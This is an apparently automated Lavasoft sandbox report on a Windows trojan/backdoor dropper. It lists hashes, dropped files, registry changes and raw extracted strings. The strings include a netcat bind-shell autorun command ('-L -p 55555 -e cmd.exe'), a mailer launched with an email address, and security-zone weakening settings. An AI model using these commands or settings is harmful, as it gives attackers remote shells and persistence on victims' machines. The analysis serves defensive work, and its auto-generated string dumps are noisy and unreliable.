RemoteAdmin.Win32.NetCat_1d23a57973
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.FAkeAlert.105 (AdAware), Backdoor.Win32.PcClient.FD, RemoteAdmin.Win32.NetCat.FD, SpyTool.Win32.Ardamax.FD, GenericEmailWorm.YR, RemoteAdminNetCat.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, RemoteAdmin, Worm, EmailWorm, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: 1d23a57973153cdfb24c05c9c3c5e2f4
SHA1: 70708f86e80f2a26b522354769afb945fec8935a
SHA256: e7999726d14f963e988cc6211138ec70cf084d0ebd4e2f0b7e9aa32c94e38c20
SSDeep: 49152:1MSFFNLrUrfcnwFC4K2 vwJKcNMwAbfpH9Ou8N:ySfNLrUQnl12uYww8Oh
Size: 1906688 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Kevin Solway
Created at: 2008-04-13 21:32:45
Analyzed on: WindowsXP SP3 32-bit
Summary:
RemoteAdmin. A system tool used to allow remote access or control of computer systems.
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The RemoteAdmin creates the following process(es):
nc.exe:1932
%original file name%.exe:580
virus.exe:1224
regedit.exe:972
The RemoteAdmin injects its code into the following process(es):
ALW.exe:1160
rundll32.exe:1532
File activity
The process %original file name%.exe:580 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\nc.exe (2025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\foto.jpg (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\wsetup.cmd (966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\virus.exe (33520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\INDEXH~1.TXT (122 bytes)
The process virus.exe:1224 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.01 (82 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.00 (2 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe (15021 bytes)
%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.02 (57 bytes)
Registry activity
The process nc.exe:1932 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 14 48 BA 2A 49 22 43 BB E9 C6 A9 A7 D1 F8"
The process ALW.exe:1160 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 AE 10 72 B9 94 99 59 34 40 69 8C 05 6E 3B 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ALW Start" = "%Documents and Settings%\All Users\Application Data\ITKVAP\ALW.exe"
The process %original file name%.exe:580 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 CF 8E BC 38 29 58 01 76 B3 89 D7 E9 08 6E 36"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
The process virus.exe:1224 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 08 85 B2 97 72 FA E1 C8 65 20 9A 2F F2 CA 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\ITKVAP]
"ALW.exe" = "ALW"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The RemoteAdmin modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The RemoteAdmin modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The RemoteAdmin modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process regedit.exe:972 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB BD 4D 05 69 23 3B AA 1D FB FB 29 40 F8 7E E8"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "c:\windows\system32\index1.html"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "c:\windows\system32\nc.exe -d -L -p 55555 -e cmd.exe"
"Virus" = "c:\windows\system32\virus.exe andrescruzvtj@hotmail.com"
The process rundll32.exe:1532 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 61 02 5C 4F 7A F7 C2 27 B2 B6 74 ED 4C FC F2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
1c902448ba8c2385602c8f5315f35204 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.01 |
d92e93f974e833bb6b9cae597fcf8a49 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.02 |
bb251a9f308d046931dcba40fb1e0450 | c:\Documents and Settings\All Users\Application Data\ITKVAP\ALW.exe |
e0fb946c00b140693e3cf5de258c22a1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\nc.exe |
6fbb7d7530f7362b5495006fc5bb7909 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\virus.exe |
e0fb946c00b140693e3cf5de258c22a1 | c:\WINDOWS\system32\nc.exe |
6fbb7d7530f7362b5495006fc5bb7909 | c:\WINDOWS\system32\virus.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.5512
Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.5512 (xpsp.080413-2105)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: Spanish (Spain, International Sort)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 39368 | 39424 | 4.5598 | 25b5d82208cedbbbc7ee430a4202819c |
.data | 45056 | 7140 | 1024 | 2.94449 | 99858e86526942a66950c7139f78a725 |
.rsrc | 53248 | 1867776 | 1865216 | 5.5405 | 012b992d76feb456da9e4e33b0ff74f1 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The RemoteAdmin connects to the servers at the folowing location(s):
.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
COMCTL32.dll
VERSION.dll
advapi32.dll
advpack.dll
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupx.dll
IXPd.TMP
TMP4351$.TMP
FINISHMSG
USRQCMD
ADMQCMD
msdownld.tmp
wextract.pdb
PSSSSSSh
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
GetWindowsDirectoryA
ExitWindowsEx
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
foto.jpg
INDEXH~1.TXT
nc.exe
virus.exe
wsetup.cmd
. &.#&'&
UeXe
9Eu%x
8E%SH<
lO)%u
-]aRZ
}-u"=-9}
K.pf1
-K}FM
s.fJO}
.UK!R
%.oC3![*
.mKIz
.WY%]
R.lqZ
E.Pq}#
P{).ZDF
T%Fn:
2c.ncl
.CB!X
%sUvh
0@{%X
2k%uHyX9
'9h.nw
2.nKa
vs^f.et
.FBn6QN
38.GT
^*.BQ
1*/.zx>
#7.iZ2j
.lx\,
4T%_%u"H
eAswM.hL
%ZW{%x6
5#h.Gun9%dO.iSqOssy-)p\.FG%ueT~C1.lD,I.TBvZ7.OSW%XPkvRj.TMfGtB*.fYx{,/7[(]67=v%scj8.rfE.iHS,.yZ2= =%D.Qj`H%%s;JAB)L9%X^5p8uLR%X.*^ h%U}.sGHRNAp.stt.EH /.kb,)qwWyC^M.tKG%x]X*K.vh(j9.JZ_3lm.FxkJ8H%SZkÊbkEyQ6P%s\=C.ve3%uCen(Æ@.%U=.sn$j67:%cg.bc%.Hv{iT7=%8.wDI0K%u3r.iCWv.FoQg}3%S9B%x!UkX%FU!CE%uW8xHg.vbL#'x$z9!.fM>Z9msG%Sqz)\Sn%Dw1O.kk_F.uStG;crt.gGwWk.SZ9A}%Szky`%fht.Icp.GrYjD.uhz.ÓIor.Xh^NWFE%X,.kR~K("M.WE.yt7T/s%x,%FuPCP)>%ULs*Y:oójJC.bMK.st2yI7Cx%U1_.epzt%umUw..VdZ-Tw}z.LTwl%US#.jiY>K^9v%uA@-tcP_.oI@1.Lf;hw.VR.aDOE%s @U.Lw52.BGCw{3.XxdS8%xK%CYf;.Naz(gB.pDEaI%b.Wr.Bv L2%u'?aE#GsN*.xrW&.BqQ-J}VM>\.zMqÃ><$;.DktQP%f?7@Ïh;u%Sn?A%S6&.jT9%XW`g1w6.OhUR%.cH.gP`1%uS9UJUcpa=%u$%fkmb%UfEeUw.mGv{@_.JD\.aL,f.Fq'>YKr%Sj7E,%Xn de espacio en: %s.Mensaje de sistema: %s.5No se puede encontrar uno de los recursos necesarios.#n del sistema operativo./Error en la solicitud de asignacin no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio primero y presione Reintentar, o presione Cancelar para salir del programa de instalacin.XLa carpeta no es vrese de que la carpeta existe y se puede escribir en ella.DDebe especificar una carpeta con la ruta completa o elegir Cancelar.n de carpeta.DNo se puede cargar las funciones requeridas por el dilogo Examinar.\No se pudo cargar el archivo Shell32.dll, requerido por el cuadro de din del proceso <%s>. Causa: %s5El tamaster en este sistema no es soportado.3Uno de los recursos necesarios parece estar daado.[Es necesario Windows 95 o Windows NT 4.0 Beta 2 o posterior para realizar esta instalaciError al cargar %s]Error de GetProcAddress() en funcin "%s". Causa posible: versin incorrecta de advpack.dll.@Es necesario Windows 95 o Windows NT para instalar este producto No se pudo crear la carpeta "%s"Para instalar este programa, necesita %s KB disponibles en la unidad %s. Es recomendable que libere la cantidad necesaria de espacio en disco antes de continuar.n de la carpeta de Windows)Apagar NT: Error en token de OpenProcess.*Apagar NT: Error en AdjustTokenPrivileges."Apagar NT: Error en ExitWindowsEx.n del archivo. Probablemente se deba a un problema de memoria baja (poco espacio en disco para el intercambio de archivos) o un archivo .CAB daado.wEl programa de instalacin del volumen para la unidad (%s) .Mensaje del sistema: %s.n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio e intntelo de nuevo.hEl programa de instalaci[Otra copia del paquete "%s" ya estDesea ejecutar otra copia?$No se pudo encontrar el archivo: %s.No existe la carpeta "%s".Desea crearla?lOtra copia del paquete "%s" ya estlo es posible ejecutar una copia a la vez.OEl paquete "%s" no es compatible con la versin de Windows que estejecutando.^El paquete "%s" no es compatible con la versin del archivo %s que se encuentra en su sistema.6.00.2900.5512 (xpsp.080413-2105)WEXTRACT.EXESistema operativo MicrosoftWindows6.00.2900.5512cmd.exe_1116:
.text`.data.rsrcKERNEL32.dllNTDLL.DLLmsvcrt.dllUSER32.dllSetConsoleInputExeNameWAPerformUnaryOperation: '%c'APerformArithmeticOperation: '%c'ADVAPI32.dllSHELL32.dllMPR.dllRegEnumKeyWRegDeleteKeyWRegCloseKeyRegOpenKeyWRegCreateKeyExWRegOpenKeyExWShellExecuteExWCmdBatNotificationGetWindowsDirectoryWGetProcessHeapGetCPInfoGetConsoleOutputCP_pipeGetProcessWindowStationcmd.pdbfoto.jpg c:\windows\system32\virus.exe andrescruzvtj@hotmail.comoto.jpg\windows\system32\virus.exe andrescruzvtj@hotmail.comfoto.jpgus.exe andrescruzvtj@hotmail.comfoto.jpgexe andrescruzvtj@hotmail.comfoto.jpge andrescruzvtj@hotmail.comfoto.jpgndrescruzvtj@hotmail.comfoto.jpgvirus.exe andrescruzvtj@hotmail.comfoto.jpg -e cmd.exestart /b c:\windows\system32\virus.exe andrescruzvtj@hotmail.comfoto.jpg -L -p 55555 -e cmd.exefoto.jpg.exe -d -L -p 55555 -e cmd.exefoto.jpgxe -d -L -p 55555 -e cmd.exefoto.jpgfoto.jpgxe andrescruzvtj@hotmail.comfoto.jpgmfoto.jpgtart /b c:\windows\system32\virus.exe andrescruzvtj@hotmail.comCMD Internal Error %s)(&&())))(&)))&((&)&))&()))&((&)&)&())))(&&()))&))))CMD.EXE()|&=,;"COPYCMD\XCOPY.EXECMDCMDLINEWKERNEL32.DLLSoftware\Policies\Microsoft\Windows\System0123456789cmd.exeDIRCMD%d.%d.dUngetting: '%s'DisableCMDGeToken: (%x) '%s'%s\Shell\Open\Command%x %c*** Unknown type: %xArgs: `%s'Cmd: %s Type: %x%s (%s) %soto.jpgc:\windows\system32\virus.exe andrescruzvtj@hotmail.comws\system32\nc.reg32\nc.regC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\foto.jpgtmail.com.com"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP>.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wiresharkows\system32\nc.regm32\nc.regc.regCMDEXTVERSIONKEYSC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMPc:\windows\system32\virus.exe andrescruzvtj@hotmail.com%s %sC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\virus.exe(%s) %s%s %s%s&()[]{}^=;!%' ,`~d%sd%s-%sd%sd%sdd%sd%sd%s=%sX-X.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS<> -*/%()|^&=,\CMD.EXEWindows Command Processor5.1.2600.5512 (xpsp.080413-2111)Cmd.ExeWindowsOperating System5.1.2600.5512Press any key to continue . . . %0operable program or batch file.The system cannot execute the specified program.and press any key when ready. %0Microsoft Windows XP [Version %1]%0a pipe operation.KEYS is on.KEYS is off.The process tried to write to a nonexistent pipe.The switch /Y may be preset in the COPYCMD environment variable.to prompt on overwrites unless COPY command is being executed fromSwitches may be preset in the DIRCMD environment variable. OverrideQuits the CMD.EXE program (command interpreter) or the current batchCMD.EXE. If executed from outside a batch script, itwill quit CMD.EXEERRORLEVEL that number. If quitting CMD.EXE, sets the processDisplays or sets a search path for executable files.Type PATH ; to clear all search-path settings and direct cmd.exe to searchChanges the cmd.exe command prompt.$B | (pipe)$V Windows XP version numberDisplays, sets, or removes cmd.exe environment variables.Displays the Windows XP version.Tells cmd.exe whether to verify that your files are written correctly to aRecords comments (remarks) in a batch file or CONFIG.SYS.Press any key to continue . . . %0Directs cmd.exe to a labeled line in a batch program.NOT Specifies that Windows XP should carry outwill execute the command after the ELSE keyword if theI The new environment will be the original environment passedto the cmd.exe and not the current environment.SEPARATE Start 16-bit Windows program in separate memory spaceSHARED Start 16-bit Windows program in shared memory spaceIf it is an internal cmd command or a batch file thenthe command processor is run with the /K switch to cmd.exe.If it is not an internal cmd command or batch file thenparameters These are the parameters passed to the command/programunder Windows XP.Starts a new instance of the Windows XP command interpreterCMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]/D Disable execution of AutoRun commands from registry (see below)/A Causes the output of internal commands to a pipe or file to be ANSI/U Causes the output of internal commands to a pipe or file to bevariable var at execution time. The %var% syntax expands variablesof an executable file.If /D was NOT specified on the command line, then when CMD.EXE starts, iteither or both are present, they are executed first.HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRunHKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRuncan enable or disable extensions for all invocations of CMD.EXE on afollowing REG_DWORD values in the registry using REGEDT32.EXE:HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensionsHKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensionsparticular invocation of CMD.EXE with the /V:ON or /V:OFF switch. Youcan enable or disable completion for all invocations of CMD.EXE on aHKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansionHKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansionat execution time.CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disablecompletion for all invocations of CMD.EXE on a machine and/or user logonthe registry using REGEDT32.EXE:HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionCharHKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionCharHKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionCharHKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionCharShift key with the control character will move through the list&()[]{}^=;!%' ,`~Command Processor Extensions enabled by default. Use CMD /? for details.ASSOC [.ext[=[fileType]]].ext Specifies the file extension to associate the file type withASSOC .pl=PerlScriptFTYPE PerlScript=perl.exe %%1 %%*script.pl 1 2 3set PATHEXT=.pl;%%PATHEXT%%The restartable option to the COPY command is not supported bythis version of the operating system.The following usage of the path operator in batch-parameterThe unicode output option to CMD.EXE is not supported by thisversion of the operating system.If Command Extensions are enabled the DATE command supportsIf Command Extensions are enabled the TIME command supportsIf Command Extensions are enabled the PROMPT command supportsis pretty simple and supports the following operations, in decreasing! ~ - - unary operators* / %% - arithmetic operators- - arithmetic operators&= ^= |= <<= >>=If you use any of the logical or modulus operators, you will need tovalues. If SET /A is executed from the command line outside of aassignment operator requires an environment variable name to the left ofthe assignment operator. Numeric values are decimal numbers, unlessoccurrence of the remaining portion of str1.Finally, support for delayed environment variable expansion has beenadded. This support is always disabled by default, but may beenabled/disabled via the /V command line switch to CMD.EXE. See CMD /?of text is read, not when it is executed. The following exampleSo the actual FOR loop we are executing is:%Í%% - expands to the current directory string.%ÚTE%% - expands to current date using same format as DATE command.%%CMDEXTVERSION%% - expands to the current Command Processor Extensions%%CMDCMDLINE%% - expands to the original command line that invoked theIf Command Extensions are enabled the SHIFT command supportscontrol is passed to the statement after the label specified. You must%%4 %%5 ...)CMD /? for details.This works because on old versions of CMD.EXE, SETLOCAL does NOTcommand execution.non-executable files may be invoked through their file association justby typing the name of the file as a command. (e.g. WORD.DOC wouldlaunch the application associated with the .DOC file extension).When executing an application that is a 32-bit GUI application, CMD.EXEthe command prompt. This new behavior does NOT occur if executingWhen executing a command line whose first token is the string "CMD "without an extension or path qualifier, then "CMD" is replaced withthe value of the COMSPEC variable. This prevents picking up CMD.EXEWhen executing a command line whose first token does NOT contain anextension, then CMD.EXE uses the value of the PATHEXT.COM;.EXE;.BAT;.CMDWhen searching for an executable, if there is no match on any extension,If Command Extensions are enabled, and running on the Windows XPforms of the FOR command are supported:Walks the directory tree rooted at [drive:]path, executing the FORpasses the first blank separated token from each line of each file.is a quoted string which contains one or more keywords to specifydifferent parsing options. The keywords are:be passed to the for body for each iteration.where a back quoted string is executed as aFOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%kwould parse each line in myfile.txt, ignoring lines that begin witha semicolon, passing the 2nd and 3rd token from each line to the forline, which is passed to a child CMD.EXE and the output is capturedIF CMDEXTVERSION number commandThe CMDEXTVERSION conditional works just like ERRORLEVEL, except it isCMDEXTVERSION conditional is never true when Command Extensions are%%CMDCMDLINE%% will expand into the original command line passed toCMD.EXE prior to any processing by CMD.EXE, provided that there is notalready an environment variable with the name CMDCMDLINE, in which case%%CMDEXTVERSION%% will expand into a string representation of thecurrent value of CMDEXTVERSION, provided that there is not alreadyan environment variable with the name CMDEXTVERSION, in which case youunder Windows XP, as command line editing is always enabled.CMD.EXE was started with the above path as the current directory.UNC paths are not supported. Defaulting to Windows directory.CMD does not support UNC paths as current directories.UNC paths not supported for current directory. Usingto create temporary drive letter to support UNC currentMissing operand.Missing operator.The COMSPEC environment variable does not point to CMD.EXE.The FAT File System only support Last Write Timesof a batch script is reached, an implied ENDLOCAL is executed for anyapplication execution.The switch /Y may be present in the COPYCMD environment variable.to prompt on overwrites unless MOVE command is being executed fromwhen CMD.EXE started. This value either comes from the current consoleThe COLOR command sets ERRORLEVEL to 1 if an attempt is made to executenc.exe_1932:
.text`.rdata@.data.idata.BENuuser32.dllWaitForMultipleObjects error: %sFailed to create ReadShell session thread, error = %sFailed to execute shellFailed to create shell stdin pipe, error = %sFailed to create shell stdout pipe, error = %sFailed to execute shell, error = %sSessionReadShellThreadFn exitted, error = %s%s: option `%s' requires an argument%s: option `%c%s' doesn't allow an argument%s: option `--%s' doesn't allow an argument%s: invalid option -- %c%s: illegal option -- %c%s: option requires an argument -- %c%s: unrecognized option `%c%s'%s: unrecognized option `--%s'%s: option `%s' is ambiguoussent %d, rcvd %dVERNOTSUPPORTEDAFNOSUPPORTPFNOSUPPORTSOCKTNOSUPPORTPROTONOSUPPORTMSGSIZEHmalloc %d failedDNS fwd/rev mismatch: %s != %sWarning: forward host lookup failed for %s: h_errno %d%s: inverse host lookup failed: h_errno %dWarning: inverse host lookup failed for %s: h_errno %d%s: forward host lookup failed: h_errno %dCan't parse %s as an IP addressWarning: port-bynum mismatch, %d != %dloadports: bogus values %d, %dloadports: no block?!Can't grab %s:%d with bindretrying local %s:%dconnect to [%s] from %s [%s] %dinvalid connection to [%s] from %s [%s] %d] %d ...UDP listen needs -p argudptest first write failed?! errno %dPreposterous Pointers: %d, %dsent %d, rcvd %d%s [%s] %d (%s)%s [%s] %d (%s) openno port[s] to connect toinvalid port %scan't open %sinvalid wait-time %sinvalid local port %sinvalid interval time %sinvalid hop pointer %d, must be multiple of 4 <= 28Cmd line:port numbers can be individual or ranges: m-n [inclusive]UDP modedelay interval for lines sent, ports scanned-p portlocal port numberrandomize local and remote portsinbound program to exec [dangerous!!]nc [-options] hostname port[s] [ports] ...nc -l -p port [options] [hostname] [port]c:\windows\system32\nc.exeDisconnectNamedPipeCreatePipePeekNamedPipeKERNEL32.dllWSOCK32.dllGetCPInforundll32.exe_1532:
.text`.data.rsrcmsvcrt.dllKERNEL32.dllNTDLL.DLLGDI32.dllUSER32.dllIMAGEHLP.dllrundll32.pdb.....eZXnnnnnnnnnnnn3....eDXnnnnnnnnnnnn3...eDXnnnnnnnnnnnn,.eDXnnnnnnnnnnnn,%Xnnnnnnnnnnnnnnn1O3$dS7"%U9.manifest5.1.2600.5512 (xpsp.080413-2105)RUNDLL.EXEWindowsOperating System5.1.2600.5512YThere is not enough memory to run the file %s.Please close other windows and try again.9The file %s or one of its components could not be opened.0The file %s or one of its components cannot run.MThe file %s or one of its components requires a different version of Windows.UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"Error in %sMissing entry:%sError loading %sALW.exe_1160:
.text`.rdata@.data.rsrcudPhPSSSSSShvSSShFTPjKFtPj;C.PjRVtGHt.Ht&.EKSWUFTPGFTPjFtPS=KNILw.tT=RCNEw_0 _8 _4;_,SHA1 block transform for x86, CRYPTOGAMS bySHA256 block transform for x86, CRYPTOGAMS byDlSHA512 block transform for x86, CRYPTOGAMS byMontgomery Multiplication for x86, CRYPTOGAMS by6-9'6-9'$6.:$6.:*?#1*?#1>8$4,8$4,AES for x86, CRYPTOGAMS byCamellia for x86 byRC4 for x86, CRYPTOGAMS byFRegDeleteKeyExWMARGIN-BOTTOM: 11px; BORDER-STYLE: solid; BORDER-COLOR: #DFDFE5; BORDER-WIDTH: 2px; BACKGROUND-COLOR: #DFDFE5; }H2 { COLOR: black; BACKGROUND-COLOR: #FFFFF; FONT-SIZE: 12pt; FONT-WEIGHT: normal; MARGIN-BOTTOM: 0px; MARGIN-TOP: 10px;}mail@domain.comDate: %d %s %d %d:%d:%dEHLO %s,qop=%s,response=%s,digest-uri="%s",cnonce="%s",nc=%s,nonce="%s",realm="%s"charset=utf-8,username="%s"smtp/AUTH PLAIN %s^%s^%sAUTH LOGINLOGIN--%s--RCPT TO:<%s>MAIL FROM:<%s>Please contact the application's support team for more information.- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedoperatorGetProcessWindowStationUSER32.DLLportuguese-brazilianADVAPI32.DLLkernel32.dllUxTheme.dllOLEACC.dllpassed a null parameterDSO support routinesx509 certificate routineserror:lX:%s:%s:%sssl_sess_certssl_certevp_pkeyx509_pkey%s(%d): OpenSSL internal error, assertion failed: %slhash part of OpenSSL 1.0.0d 8 Feb 2011Stack part of OpenSSL 1.0.0d 8 Feb 2011supportedAlgorithmscrossCertificatePaircertificateRevocationListcACertificateuserCertificateuserPasswordsupportedApplicationContextMicrosoft Local Key setLocalKeySetid-Gost28147-89-None-KeyMeshingid-Gost28147-89-CryptoPro-KeyMeshingpassword based MACid-PasswordBasedMACX509v3 Certificate IssuercertificateIssuercerticom-arcProxy Certificate InformationproxyCertInfoMicrosoft 